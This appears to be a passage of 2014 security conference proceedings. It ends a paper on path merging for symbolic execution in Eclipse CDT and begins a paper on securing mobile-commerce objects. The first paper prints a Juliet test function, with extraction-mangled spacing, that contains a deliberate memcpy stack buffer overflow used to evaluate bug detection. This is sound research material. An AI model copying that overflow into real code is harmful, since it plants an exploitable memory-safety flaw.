v o i d CWE121 memcpy 12 bad simplified ( ) {
if ( global returns t or f ()) {
charvoid cv struct ;
c v s t r u c t . y = ( v o i d ∗ ) SRC STR ;
/ ∗ FLAW: Use t h e s i z e o f ( c v s t r u c t ) which
w il l overwrite the p o in t e r y ∗/
memcpy ( c v s t r u c t . x , SRC STR ,
sizeof ( cv struct ) ) ;
/∗ n u l l terminate the s t r i n g ∗/
cv struct . x [( sizeof ( cv struct . x )/ sizeof (
char )) −1] = ’ \0 ’ ;
}
else {
charvoid cv struct ;
c v s t r u c t . y = ( v o i d ∗ ) SRC STR ;
/ ∗ FIX : Use s i z e o f ( c v s t r u c t . x ) t o a v o i d
overwriting the p o i n te r y ∗/
memcpy ( c v s t r u c t . x , SRC STR ,
sizeof ( cv struct . x ) ) ;
/∗ n u l l terminate the s t r i n g ∗/
cv struct . x [( sizeof ( cv struct . x )/ sizeof (
char )) −1] = ’ \0 ’ ;
}
}
Figure 3. Simplified example function from [16], contains a buffer overflow
in the then branch. Corresponding CFG in Figure 2.
sublogic of arrays, uninterpreted functions and nonlinear integer and real arithmetic (AUFNIRA). Backtracking is enabled
by a class ActionLog which records certain semantic actions
performed for CFG nodes on the current path (e.g., variable
creation or hiding). If for example a function exit is backtracked, the function’s stack frame with contained variables
must be made visible again. Dead variables are therefore not
garbage-colled, because this would impede backtracking. The
engine further allows to record and visualize explored parts
of a program execution tree. The engine was evaluated in
[12] by measuring detection accuracy (false positives and false
negatives) and run-times for the detection of buffer overflows
in Juliet test programs.
B. Path merging
In this implementation, paths are merged at function exit.
The method can merge paths which have split since entering
the same function, with the possibility that several other
functions are called between entering and leaving the function.
Path merging needs knowledge about the sets of written
variables since path split. The implementation uses the class
ActionLog from [12] to derive this information. It contains
all writes to variables, including writes to globals and writes
through pointers (potentially to other stack frames). The action
log is looked through backwards up to the current function’s
CFG start node, and the reduced local context is built from
the variable declaration actions. The reduced local context is
yielded by removing all writes to variables if the variables
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
don’t have global scope, are not written through pointers and
are not the current function’s return value. This approach does
not necessitate a comparably more complex dead/live variable
analysis. Path merge possibilities are detected using a class
ContextCache, which is a HashSet. The keys are exit
nodes with function call context, the values are the observed
reduced local contexts. The context cache is queried at each
function exit (CFG exit node). Comparing the reduced local
contexts does not necessitate expensive calls to the SMT solver.
An example function is shown as listing in Figure 3. It is
a simplified version of a ’bad’ function from one of the buffer
overflow test cases of the Juliet suite. The control flow graph
of this function is shown in Figure 2. The function contains a
decision node corresponding to an if/else statement, for
which both branches are satisfiable. The error location is
marked by red underlining in the branch on the right of Figure
2. and by a comment in the listing. For both branches, the
function only writes to stack variables, and the reduced local
context at function exit is the empty set. Merging the two
paths at function exit which have split at the decision node is
therefore clearly possible without missing any bug.
Path merging applies in the same way to branches which
belong to loops, when the loop iteration number depends on
program input (otherwise there would be only one satisfiable
sub-path through the loop). Symbolic execution is currently
applied with loop unrolling up to a maximum loop depth
bound. A path through a loop can therefore split into a
maximum number of paths equal to the loop unrolling bound.
Branch nodes in the CFG belonging to loop statements are
treated by symbolic execution just as branch nodes belonging
to if/else statements. The branch nodes also have the same
labels, ’then’ for the loop body and ’else’ to skip the
loop. The only difference is that loops have a connector node
with two incoming branches, which closes the loop before the
decision node. This however has no influence on the merging
of unrolled paths.
IV.
E XPERIMENTS
Path merging is evaluated on the same buffer overflow test
programs from the Juliet suite as [12]. These programs contain
buffer overflows with the memcpy (18 programs) and fgets
(36 programs) standard library functions, and cover the Juliet
control and data flow variants for C (e.g., multipath loops and
fuction pointers). A screenshot for error reporting with the
CDT GUI is shown in Figure 7. The tests are run as JUnit
plug-in tests with Eclipse 4.3 on 64bit Linux kernel 3.2.0 and
an i7-4770 CPU. The same bug detection accuracy with and
without path merging is validated, there are no false positive
or false negative bug detections on the test set.
Figures 4. and 5. illustrate the merging of paths, which
corresponds to folding the execution tree. Figure 4. shows
the execution tree for a memcpy buffer overflow with flow
variant 12. This test program contains a ’good’ and a ’bad’
function, where both functions contain a decision node with
two satisfiable branches. The bad function is given in a
simplified version in Figure 3. The tree shows only decision
nodes and branch nodes. Figure 5. shows the same tree when
path merging is applied. Paths are merged at two points which
are indicated in the tree (the two function exits), and the
traversal of two subtrees is skipped.
182
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 4. Execution tree for test program CWE121_Stack_Based_Buffer_Overflow__char_type_overrun_memcpy_12 from [16], showing only
decision and branch nodes.
Figure 5. Effect of path merging for the test program of Figure 4. The execution tree is folded at two locations. The number of traversed satisfiable paths is
reduced from four to one.
TABLE I. Analysis runtime sums for the two test sets, with and without path merging.
CWE121 memcpy
(18 test programs)
CWE121 CWE129 fgets
(36 test programs)
Sum
(54 test programs)
backtracking according to [12]
14,7 s
80,7 s
95,4 s
backtracking and path merging
15,3 s
34,4 s
49,7 s
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
183
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[6]. Merging of paths with live differences is investigated in
[23]. Path disjunctions are used in the corresponding logic
formulation passed to the solver. Heuristics for path merging
are presented, which aim at balancing computational effort
between the symbolic execution frontend and the SMT solver
backend. The implementation extends [6].
Figure 6. Analysis runtimes with and without path merging for 54 buffer
overflow test programs from [16], with corresponding control/data flow
variant numbers.
Figure 6. shows the analysis runtimes for the set of buffer
overflows with fgets, for the backtracking engine and for
backtracking with path merging. The figure uses a logarithmic
scale and contains values for 36 flow variants. Flow variants
in Juliet are not numbered consecutively, to leave room for
later insertions. Since path merging folds complete subtrees
of a program’s execution tree, it has an exponential effect
on runtimes. This is exemplified by flow variant 12. While
merging paths for the memcpy buffer overflow with variant
12 reduces the runtime from 1.1 s to 0.8 s, the runtime for
the fgets buffer overflow is reduced from 22.8 s (longest
analysis time for any tested program) to 1.7 s. This is because
the fgets program contains several other decision nodes with
two satisfiable branches.
The sum analysis runtimes for the two test sets are given
in table I. For the memcpy overflows path merging increases
the runtime a little bit due to the overhead of computing
and comparing reduced local contexts. Most of the memcpy
programs do not contain a single decision for which both
branches are satisfiable, and therefore no merge possibilities.
The fgets test programs all contain such decisions, and the
sum runtime is reduced by path merging from 80.7 s to 34.4
s. The sum runtime for the 54 programs without merging is 94
s, while path merging reduces it to 50s. The overall speedup
with path merging on the test set is therefore about two, which
is considerable for the tiny Juliet programs.
V. R ELATED W ORK
There is a large body of work on symbolic execution
available which spans over 30 years [10]. Dynamic symbolic
execution for test case generation for x86 binaries is presented
in [20]. To reduce complexity, only variables are modelled as
symbolic which directly depend on program input, in order
to find exploitable bugs. Most tools perform symbolic execution on an intermediate code representation. Apart from [6],
where LLVM intermediate code is analyzed using a worklist
algorithm, prominent symbolic execution engines are presented
in [21] and [22]. In [21], dynamic symbolic execution of
the Common Intermediate Language (MSIL/CIL) is performed
for test case generation. The engine described in [22] analyzes Java bytecode. Sound path merging based on dead path
differences is presented in [15], the implementation extends
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
VI. C ONCLUSION
This paper described the extension of a source-level backtracking symbolic execution engine for C/C++ with path
merging functionality and its implementation in Eclipse CDT.
The evaluation with tiny test programs from the Juliet suite
already showed a significant speedup. For larger programs
path merging has an exponential effect on analysis runtimes
(exponential in the number of decision nodes with more than
one satisfiable branch). Future work might include extensions
in different directions. One is to investigate the effect of
additional merge points, for example at connector nodes after
if/else and switch statements and loops, A memoryefficient implementation of the context cache might exploit
redundant information due to shared sub-paths. The very
simple live variable analysis implementation can be improved
to find more merge possibilities. Inter-procedural live variable
analysis could find merge possibilities, e.g., in certain flow
variants with dead global variables. Another direction is the
extension to support path merging in the analysis of multithreaded code, in a straight-forward combination with [24].
A way to make the analysis scalable in order to analyze
practical programs is to restrict the code coverage, for example,
to branch coverage. There are less merge possibilities when
coverage is restricted to fewer program paths, but path merging
remains applicable without changes.
ACKNOWLEDGEMENT
This work was funded by the German Ministry for Education and Research (BMBF) under grant 01IS13020.
R EFERENCES
[1] J. King, “Symbolic execution and program testing,” Communications
of the ACM, vol. 19, no. 7, 1976, pp. 385–394.
[2] L. deMoura and N. Bjorner, “Satisfiability modulo theories: Introduction
and applications,” Communications of the ACM, vol. 54, no. 9, 2011,
pp. 69–77.
[3] C. Barrett, A. Stump, and C. Tinelli, “The SMT-LIB standard version
2.0,” in Int. Workshop Satisfiability Modulo Theories, 2010.
[4] L. deMoura and N. Bjorner, “Z3: An efficient SMT solver,” in Tools
and Algorithms for the Construction and Analysis of Systems (TACAS),
2008, pp. 337–340.
[5] C. Cadar, V. Ganesh, P. Pawlowski, D. Dill, and D. Engler, “EXE:
Automatically generating inputs of death,” in 13th ACM Conference on
Computer and Communications Security (CCS), 2006, pp. 322–335.
[6] C. Cadar, D. Dunbar, and D. Engler, “KLEE: Unassisted and automatic
generation of high-coverage tests for complex systems programs,” in
USENIX Symposium on Operating Systems Design and Implementation (OSDI), 2008, pp. 209–224.
[7] C. Lattner and V. Adve, “LLVM: A compilation framework for lifelong
program analysis and transformation,” in Int. Symp. Code Generation
and Optimization (CGO), 2004, p. 75.
[8] C. Cadar et. al., “Symbolic execution for software testing in practice –
preliminary assessment,” in Int. Conf. Software Eng., 2011, pp. 1066–
1071.
[9] C. Pasareanu and W. Visser, “A survey of new trends in symbolic
execution for software testing and analysis,” Int. J. Software Tools
Technology Transfer, vol. 11, 2009, pp. 339–353.
184
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 7. Error reporting in the Eclipse GUI.
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
[22]
C. Cadar and K. Sen, “Symbolic execution for software testing: Three
decades later,” Communications of the ACM, vol. 56, no. 2, 2013, pp.
82–90.
T. Kremenek, “Finding software bugs with the Clang static analyzer,”
LLVM Developers’ Meeting, Aug. 2008, retrieved: 09/2014. [Online].
Available: http://llvm.org/devmtg/2008-08/Kremenek\ StaticAnalyzer.
pdf
A. Ibing, “Parallel SMT-constrained symbolic execution for Eclipse
CDT/Codan,” in Int. Conf. Testing Software and Systems (ICTSS),
2013, pp. 196–206.
A. Laskavaia, “Codan- C/C++ static analysis framework for CDT,”
in EclipseCon, 2011, retrieved: 09/2014. [Online]. Available: http:
//www.eclipsecon.org/2011/sessions/index0a55.html?id=2088
F. Nielson, H. Nielson, and C. Hankin, Principles of Program Analysis.
Springer, 2010.
P. Boonstoppel, C. Cadar, and D. Engler, “RWset: Attacking path
explosion in constraint-based test generation,” in Tools and Algorithms
for the Construction and Analysis of Systems (TACAS), 2008, pp. 351–
366.
T. Boland and P. Black, “Juliet 1.1 C/C++ and Java test suite,” IEEE
Computer, vol. 45, no. 10, 2012, pp. 88–90.
R. Martin, S. Barnum, and S. Christey, “Being explicit about security
weaknesses,” CrossTalk The Journal of Defense Software Engineering,
vol. 20, 3 2007, pp. 4–8.
T. Parr, Language Implementation Patterns.
Pragmatic Bookshelf,
2010.
E. Gamma, R. Helm, R. Johnson, and J. Vlissides, Design Patterns:
Elements of Reusable Object-Oriented Software.
Addison-Wesley,
1994.
P. Godefroid, M. Levin, and D. Molnar, “Automated whitebox fuzz
testing,” in Network and Distributed System Security Symp. (NDSS),
2008.
N. Tillmann and J. Halleux, “Pex – white box test generation for .NET,”
in Int. Conf. Tests and Proofs (TAP), 2008, pp. 134–153.
W. Visser, C. Pasareanu, and S. Khurshid, “Test input generation with
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[23]
[24]
Java PathFinder,” in Int. Symp. Software Testing and Analysis (ISSTA),
2004, pp. 97–107.
V. Kuznetsov, J. Kinder, S. Bucur, and G. Candea, “Efficient state
merging in symbolic execution,” in Conf. Programming Language
Design and Implementation (PLDI), 2012, pp. 193–204.
A. Ibing, “Path-sensitive race detection with partial order reduced symbolic execution,” in Workshop on Formal Methods in the Development
of Software (WS-FMDS), 2014, in press.
185
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Security Extensions for Mobile Commerce Objects
Nazri Abdullah
Ioannis Kounelis, Sead Muftic
Faculty of Computer Science and
Information Technology
Universiti Tun Hussien Onn Malaysia
Johor, Malaysia
anazri@uthm.edu.my
School of Information and
Communication Technology
Royal Institute of Technology (KTH)
Stockholm, Sweden
{kounelis, sead}@kth.se
Abstract - Electronic commerce and its variance mobile
commerce have tremendously increased their popularity in the
last several years. As mobile devices have become the most
popular mean to access and use the Internet, mobile commerce
and its security are timely and very hot topics. Yet, today there
is still no consistent model of various m–commerce applications
and transactions, even less clear specification of their security.
In order to address and solve those issues, in this paper, we
first establish the concept of mobile commerce objects, an
equivalent of virtual currencies, used for m–commerce
transactions. We describe functionalities and unique
characteristics of these objects; we follow with security
requirements, and then offer some solutions – security
extensions of these objects. All solutions are treated within the
complete lifecycle of creation and use of the m–commerce
objects.
Keywords - mobile commerce; m–commerce; m-objects;
security; privacy
I.
INTRODUCTION
As mobile commerce (m-commerce) continues to evolve,
it is a matter of time that it becomes the main source of
online commerce [1]. In this paper, we describe our vision of
m-commerce, by differentiating the goods that can be
purchased in seven categories - we call them m-commerce
objects. The m-objects have different requirements and are
therefore treated in a separate way from the actors involved
in a mobile commerce transaction.
We first provide the results of our analysis of the current
concept of m-commerce objects. However, we also take two
further steps: we consider the security features and the
extensions that they need and moreover, what mechanisms
and technology can be used to ensure and enforce such
extensions.
Our research is focused on user aspects of various m–
commerce systems, ensuring that the mechanisms we
introduce allow users to protect their privacy and at the same
time to verify authenticity, integrity and availability of
digital goods that they are purchasing.
The next section of the paper describes various examples
of m-commerce objects, based on our concept of a so-called
generic m–commerce object. Section 3 introduces the main
actors in an m-commerce scenario. Section 4 analyses
security features and requirements targeted as goals of our
design and also describes methodologies and technologies
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
that can be used for implementation of those features.
Section 5 demonstrates the dynamic use of the m-objects
security features. Section 6 briefly introduces one of the
popular m–commerce payment systems – Bitcoin and
justifies our use of some of the innovative ideas that Bitcoin
has introduced. Section 7 contains relevant work and
compares the results with ours, while in section 8 we discuss
our findings and approach. Finally, section 9 contains
conclusions and suggestions for future work
II.
SPECIFICATION OF MOBILE COMMERCE OBJECTS
It is important to understand the similarities and
differences between various types of m-commerce objects.
The definitions given below have been also documented in
our previously published research paper [2]. The criterion for
some well-known transactions to be classified as m–
commerce objects is whether they have direct – explicit or
indirect – implicit value. An example of an m–commerce
object with explicit value is a pre–paid card – its value is
money paid for the card. An example of an object with
implicit value may be various discounts or benefits based on
different types of memberships.
In this section, we list typical m–commerce objects
described in some form of an order, starting from those that
do not have explicit value all the way up to those that have
strictly determined value. The objects are also “sorted” in the
increasing complexity of their use.
The first type of m–commerce object is promotions. They
publicize a product or a service with discount, so that the
offered discount represents an implicit value of this type of
m–commerce object [3]. In a mobile digital environment,
these objects can be managed through personalized
advertisements received through the Internet or even through
a personal area network. A citizen with a Bluetooth enabled
phone, for example, may receive personalized promotions or
discounts to his/her phone via Bluetooth when shopping in a
mall. The project PROMO demonstrates how this can be
achieved [4]. Promotions do not require payments by users,
which means that this type of m–commerce objects can be
obtained without associated financial transaction.
The next type of m–commerce object is a mobile coupon.
Those are text or picture vouchers solicited or purchased and
delivered to a consumer’s mobile phone. This object can be
stored and exchanged for a financial discount, when
purchasing a product or service [5]. The most important
186
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
difference between promotions and coupons is that coupons
have a value (expressed either as discount or monetary
value), while promotions are mostly used for advertising of
discounts.
The third type of m–commerce objects that we consider
is a standard voucher used mainly today in paper form. It is
a small printed piece of paper that represents the right to
claim goods or services [6]. In the case of an m-voucher,
there is no printed copy, but a digital equivalent with the
unique identifier, such as a barcode or a Quick Respone
(QR) code, stored locally on the phone or remotely at the
m–commerce server. One example of such vouchers are
coupons distributed by Groupon [7] or some other similar
companies. In order to acquire a voucher, a payment
transaction is usually involved. The difference between a
voucher and a coupon is that the voucher is a complete
representation of a product or a service, while the coupon is
an offer/discount for the product or service. In other words,
having a voucher means that the specific product has
already been bought in advance while with a coupon
consumers may claim it at alternative places or not at all, if
the coupon was not purchased.
Another type m–commerce object is a gift card. In real
life it is usually a tangible device (plastic card), embedded
or encoded in a plastic, electronic or other form with a value
based on a payment, which promises to provide to the bearer
merchandise of value equal to the remaining balance of the
card [8]. In a digital environment, a gift card can be seen as
an equivalent to a very specific and limited pre–paid amount
in an e-wallet, which can be used only with the specific
merchant, in a particular shop or for a particular series of
products. The difference with the voucher is that a gift card
can be used as many times as possible, as long as there is
credit left in the card. The voucher however is usually
limited to one or to a predefined number of claims.
Mobile ticketing is an electronic realization with the
help of a mobile device of the proof of access/usage of
rights to a particular service [9]. There are many forms and
ways to purchase a mobile ticket. Usually, a Short Message
Service (SMS) message is the outcome of the purchase (the
receipt).
A pre-paid card has many similarities with the gift card.
It is a value stored in an e-wallet or in some account that can
be loaded with money in order to be used mostly for
micropayments [10]. The main difference with a gift card is
that a pre-paid card is intended to be used by the owner and
not to be gifted to another party and is usually not limited to
specific merchants. More importantly, a pre-paid card can
be recharged when the pre–paid amount is exhausted. By
their purpose and type of transactions supported, the very
popular pre–paid airtime may also be considered as one type
of pre–paid card. In case of airtime, such m–commerce
object is usually called telecom account.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Our final example and type of m–commerce object is a
bonus card (also called loyalty card). This type of object
usually refers to accumulation of points that a user gains
from various purchases [11]. They are usually represented
as supermarket cards, airline bonus cards, membership
cards, etc., issued by merchants/businesses that give points
to the customers depending on the value of goods or
services that they previously purchased. Their owners can
later use these points, in exchange for products or services.
Such cards are usually free to acquire, but are bound to a
user (or to a small closed and related group of users, such as
members of a family).
III.
THE CONCEPT OF M-COMMERCE TRANSACTIONS
In this section, we introduce the main actors and define
their roles in a typical m–commerce transaction together with
the terms used and their interpretation. The purpose for the
reader is to better understand the text in the remaining
sections of the paper.
There are four actors in an m–commerce transaction:
1) Merchant: This is a business entity that offers some
services or products for purchase. Merchants define
availability, price, and all specific attributes of the mcommerce objects they issue and accept.
2) Customer/User/Client: The customer is the entity that
obtains or purchases an m-commerce object in order to
later redeem it.
3) Redemption Point/Redeemer: The place where mcommerce objects can be redeemed. In some cases this
entity can be the same as the entity that issued the
object, but most likely they will differ. For example,
when buying a ticket for a concert, the merchant is the
company selling tickets, while the redemption point is
the venue where the concert takes place.
4) m–Commerce Services Provider: This is a trusted–third
party in our system. It is the central entity that all other
actors communicate with in order to handle their
requests. Depending on the actor, different roles and
services may be offered by the services provider.
Merchants use the provider to make available their mcommerce objects, customers use it to acquire such
objects and later use them, and redemption points use it
for verification of validity of m-commerce objects in
the redemption phase.
IV.
SECURITY FEATURES AND ATTRIBUTES OF MCOMMERCE OBJECTS
Each m-commerce object has a number of attributes that
define it, both in terms of security and usability. Such
attributes are required by both participating parties, object’s
issuers (merchants, m–commerce providers) and also by
users, as their enforcement is an advantage for all parties.
187
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A. Authenticity of m–Commerce Objects
This security property refers to the capability of the
recipient to verify the originality of the m-commerce object,
which includes verification of the identity of its issuer as
well as correct and original contents of an objet. Verification
can be performed by both the customer and the redeemer.
The customer should perform this check in the process of
acquisition of an m-commerce object, i.e., before paying for
it. This should be done in a timely manner, without
interfering with the customer’s purchasing experience in any
way. In the best case, it should be an automated procedure,
embedded in the acquisition phase and fully transparent to
the user. The user should only be informed of the outcome of
the procedure before giving the consent to proceed with the
payment.
The redeemer should also perform verification of the
object’s authenticity before redeeming the m-commerce
object. Such action should be performed with the assistance
of the m–commerce Provider. This control will protect the
redeemer against fraudulent attempts to acquire fake mcommerce objects.
Authenticity of m–commerce objects can be supported
by the issuer (merchant or m–commerce provider) by
digitally signing the object. Then the client will be able to
verify the signature, as the certificates of either the provider
or the merchant will be known to him/her.
B. Security of m–Commerce Objects
When referring to the security of an m-commerce object,
we are actually referring to two different aspects: the
integrity and the confidentiality of its content. These two
issues together can be also interpreted as the user’s privacy.
1) Integrity: Integrity refers to protection of the mcommerce object’s values, against illegal intentional or
accidental modifications, after its creation. This security
feature is actually equivalent to the authenticity, described
in the previous section. Therefore, all the mechanisms
described above are also applied when referring to the
integrity.
2) Confidentiality of Content/Privacy for the User:
Confidentiality of the content refers to the user’s privacy
when proving that he/she is the owner of an m-commerce
object. This property is not applicable to all m-commerce
objects, but rather depends on the type and also sensitive
nature of the object.
Namely, the user should be able to prove that he/she is
the owner of an object without revealing any information of
what he/she has purchased with that object. The content of
the object should be encrypted by the user upon purchase
and will only be decrypted when redeemed. In the
intermediate states, a header/part of the m-commerce object,
indicating the owner, will be unencrypted, but signed by the
issuer. If the m–commerce provider is involved, it is already
in possession of user’s identifying information and therefore
there is no need to exchange any extra data with every
purchase. The user should be able to define sensitivity level
of the content in accordance to his/her preferences and then
the system will enforce those preferences during the
acquisition phase.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The security mechanisms for confidentiality of m–
commerce objects are standard symmetric key crypto
algorithms. What makes this feature very complicated to
design and implement is use of partial values of some
objects. For instance, gift cards or pre–paid cards may be
partially redeemed. In such situations, encrypted objects
must be decrypted, partially claimed, and then the new
contents must be encrypted again.
C. Duplication
This is the property of m–commerce objects that
specifies whether an object can be duplicated, i.e., whether a
valid and legitimate copy of an m-commerce object can be
created by its owner. Obviously, if objects have explicit
value, this possibility should be prevented. In some virtual
currency systems this feature is called prevention of “double
spending”.
In order to guarantee non–duplication, if required, a
signature created over a random, unique, non–replicated
value is needed. Therefore, the issuer will have to create a
new value and sign a counter, possibly along with a
timestamp, which when duplicated will not be possible to be
changed, since in that case the signature will not be valid.
This security property is useful when an instance of an
m-commerce object must be unique. For example, a voucher
for a specific service or a ticket for a concert are examples of
non–duplicated objects. On the other hand, if an mcommerce object is a free of charge promotion, it is actually
in the merchant’s interest to have the object duplicated and
distributed as widely as possible, as this will give it more
visibility.
The unique value or counter must be specified by the
issuer in the process of creation of the object. In cases where
users create copies of the object, the redemption of the
second instance of the object will not be accepted as the
unique value of the counter will be checked by the
redemption point. This verification is very tricky in open,
distributed environments and the Bitcoin concept has
successfully addressed and eliminated this problem. This is
one more reason why we have adopted its concept and some
specific solutions for security of our m–commerce objects.
There is of course a risk that an m-commerce object is
illegally duplicated after its first redemption and the illegal
copy is distributed to some other entity. Then, when the
legitimate owner tries to redeem the original object, he/she
will be denied redemption. This problem may be eliminated
by having the owner to sign the object as well. Therefore, if
there is an attempt to redeem another copy of the same
object, the owner will be consulted for approval as well. In
addition, if the same person is trying to cheat the system, the
unique identifier of the object will be sufficient to prohibit
such action.
D. Transferability
This feature represents the property of an object to
legitimately change ownership of an m-commerce object.
If objects are transferable, this action must be performed
with the assistance of the m–commerce provider, since it is
the actor responsible of signing the object and assigning its
188
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
ownership. Moreover, even if a transfer is initiated or
performed by one person to another person, the two entities
will protect their privacy between them, as they will not have
to exchange any details apart from their system identifiers
(usually randomly assigned identifiers (IDs)).
The provider will receive a «transfer request» command
from the current owner along with the ID of the recipient and
then, if and only if the new owner meets all security
requirements associated with the specific object, for instance
age limit, the transfer will be performed. The owner of the
object will be changed and the object will be re–signed by
the m–commerce provider.
A drawback of this approach is the necessity to have
provider’s server connectivity at the time of the exchange. If
the server is not accessible at the time of the transaction, the
request may be temporarily saved on the current owner’s
station and when the connection is established, the request
will be forwarded to the server and the transfer of the object
will be performed.
Finally, in this stage of our research, the option to have a
fee charged for this exchange is not considered. All transfers
are free of charge. The payment in order to acquire the mcommerce object from the provider has already taken place
from the first owner.
E. Monetary Value
Monetary value is the attribute representing the financial
value of the m-commerce object, i.e., if it can be
“exchanged” for something that has a cost.
This property does not provide any extra feature or
option, as all the previous ones, but rather is a key factor
affecting which of the previous mechanisms must be
enforced to the specific m-commerce object itself. It can be
better viewed as a property rather than an extra attribute.
If an m-commerce object has a monetary value, then, it is
both in the merchant’s as well as in the consumer’s interest
to have the object secured in all the above mentioned ways.
As a conclusion, authenticity, non–duplication, integrity, and
confidentiality for each object are needed.
The contents of each object are cryptographically
encapsulated by the m–commerce provider and therefore the
m–commerce objects cannot be tampered with. It is up to the
object’s owner to disclosure such information to any third
parties or to reveal it only when absolutely needed (during
the redemption process).
F. Purchased
M-commerce objects have this property if money is
needed in order to acquire the object.
This property is strongly linked to the monetary value
property. What applies there is also applicable to this
property as well. The main difference whether an object has
been purchased or not indicates solely the way in which the
owner has acquired such object. Monetary value indicates
also the actual value of the object.
G. Multiple/Partial Use
This property indicates whether an m-commerce object
can be used more than once, i.e., if its total value may be
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
partially redeemed. If yes, then such functionality can be
enforced in two different ways:
1) There is a predefined number of uses that is decreased
after each use (or increased when the user buys some
more quantities of the object). An example may be
tickets for public transportation.
2) It can be an amount (in Euros for example) that is
decreased (or increased if the user charges the object).
This is mostly valid for a gift card.
In both cases, the m–commerce provider must be
involved in order to approve/confirm the remaining number
of uses or the amount/value of the object. The new value of
the object, after its adjustment, is signed and therefore can be
verified by the provider at any time.
H. Tracking
This is the ability of the system to track past transactions
and determine the current status of the object, i.e., the ability
to track its full life cycle.
The attributes of the m–commerce objects that may be
interesting when tracking are the date of creation, previous
uses in terms of volume and content, and information about
all previous owners. All these aspects depend on the type of
the specific m-commerce object and the specific values of its
attributes.
Tracking an object’s history may be performed by the
user without the need to engage the m–commerce provider in
that process. For example, all previous uses can be recorded
in the header of the object and in that way they may be
retrieved in a read-only mode. They are always signed by the
m–commerce provider. As such, it is generally
recommended to reveal the values of all non–sensitive
attributes (in terms of user privacy) in a read-only mode, so
users can retrieve them at any given time and without
requirement to be on-line, connected to Internet, in that
process.
V.
DYNAMIC USE OF SECURITY FEATURES
The security features described above are based on the
basic set of security services: confidentiality, integrity and
authenticity and may be applied during any phase of an mcommerce object’s lifecycle. However, what makes these
features different from the classical application of security
services in some other network application is that they are
applied in a very dynamic way.
The reason for the dynamic applicability is the complex
reuse of the majority of the m-commerce objects. For
example, a voucher that has a specific number of admissions
to a service needs to have this number updated accordingly
after each use. This implies that various features established
in the initial phase when creating an object, are re-applied
after every use of the object. Therefore, in case of m–
commerce objects, special security protocols are needed,
supporting repetitive application of security services. These
protocols, therefore, effectively ensure that in all phases of
its lifetime, each m-commerce object meets all the security
requirements according to their special needs and properties.
189
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
As explained earlier, these needs and requirements are
determined by the attributes of the specific m-commerce
object, each depending on their contents and the nature of
use. A full list of significant attributes for our m–commerce
objects is given in Table 1.
TABLE I.
Secure Email
M–COMMERCE OBJECTS AND THEIR ATTRIBUTES
(a)
(i)
The enforcement of security services that support those
requirements takes place at both, the client side and the
server side. Clients control object’s authenticity and
conformity to a predefined set of standard attribute values.
The server creates these attributes and cryptographically
encapsulates them, thus binding security credentials to the
values of the m–commerce attributes. When a value of some
attribute of an m-commerce object needs to be changed, the
client sends a corresponding request to the server which
performs the same procedure all over again, updating the
values of m-commerce objects’ attributes. By “client” in this
case we do not necessarily mean the end–user but also any
other entity in the m–commerce transactions chain, such as a
merchant or a retailer. For a more comprehensive description
of the actors and their interactions, the reader should refer to
[2].
A. Comparison with a traditional secure-by-design system.
To illustrate how the dynamic nature of security services
is different from some other traditional network applications,
in this section, we compare our previous work of a secure email system based on Secure/Multipurpose Internet Mail
Extensions (S/MIME) and security proxies [12] and the
dynamic use of security services described above.
(iii)
(ii)
(iv)
Figure 1. Secure Email Use. The security functionalities stay within the
Secure Email proxy.
In the secure e-mail system, the use of security is
straightforward. When a security method is applied, for
example encryption or signing of an e-mail letter, a security
action takes place at the e-mail client or at the security proxy
and it is directly applied to the complete and final form of the
specific e-mail letter. Then, in order to read such letter, i.e.,
decrypt or verify it, the e-mail client of the proxy server is
again used. In the intermediate states of the protected e-mail
letter, a third party cannot manipulate the message. For the
client, the security is completely transparent; he/she only
sees the “clear” output regardless of the way he/she accesses
the proxy server. When accessing the secure e-mail from any
end device (see Figure 1, i-iv), the result for the client is the
same as for all the security functionalities that are performed
internally.
M-Commerce Server
m-object
m-object
m-object
(i)
(ii)
Attributes
m-object
m-object
(iii)
Attributes
Figure 2. The dynamic reuse of security attributes for an m-commerce
object.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
190
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
In the m-commerce case, security services and
mechanisms are re-applied after every use of the mcommerce object. Although there is a similarity in the two
cases, in the sense that the server is the one that takes care of
the enforcement of the security, the use for the client is
different. When the client is using the m-object, the values of
the m-object change. This directly implies that the signature
and the authenticity of the m-object is not the same anymore
and as a result the security attributes need to be readjusted to
the new data. The server is the one that takes the
responsibility of fulfilling this task and then resends the
newly adjusted m-object to the client. The client, however, in
this case has the ability to verify and recognize the security
enhancements. This can be seen in Figure 2; as the mcommerce object is used in the real world (i-iii), its values
change. These changes are taken into account each time at
the server and as a result all the security attributes are reapplied. The attributes can be read not only by the server but
also from the client side.
VI.
BITCOIN SYSTEM
Bitcoin [13] is a virtual currency that has become very
popular in the last few years. It uses a peer-to-peer network
to authorize and verify transactions and has no central
authority like all other traditional payment systems. One of
its main advantages is that the transactions are anonymous
(actually pseudonymous) and third parties are not involved
when performing payments or transfer of money, even for
verification of participants.
Although the details of the protocol are not in the scope
of this paper, we briefly review some of the innovative
features that Bitcoin has introduced in the payment
environment and we also indicate how these features can be
applied and improved for security of our own system, that is
for security of other virtual currencies.
The most interesting feature of the Bitcoin system is the
concept and use of the blockchain. Transactions are grouped
in specific blocks of data and these blocks are linked in the
chain, called blockchain. Therefore, the blockchain contains
and reveals the history of all transactions that have taken
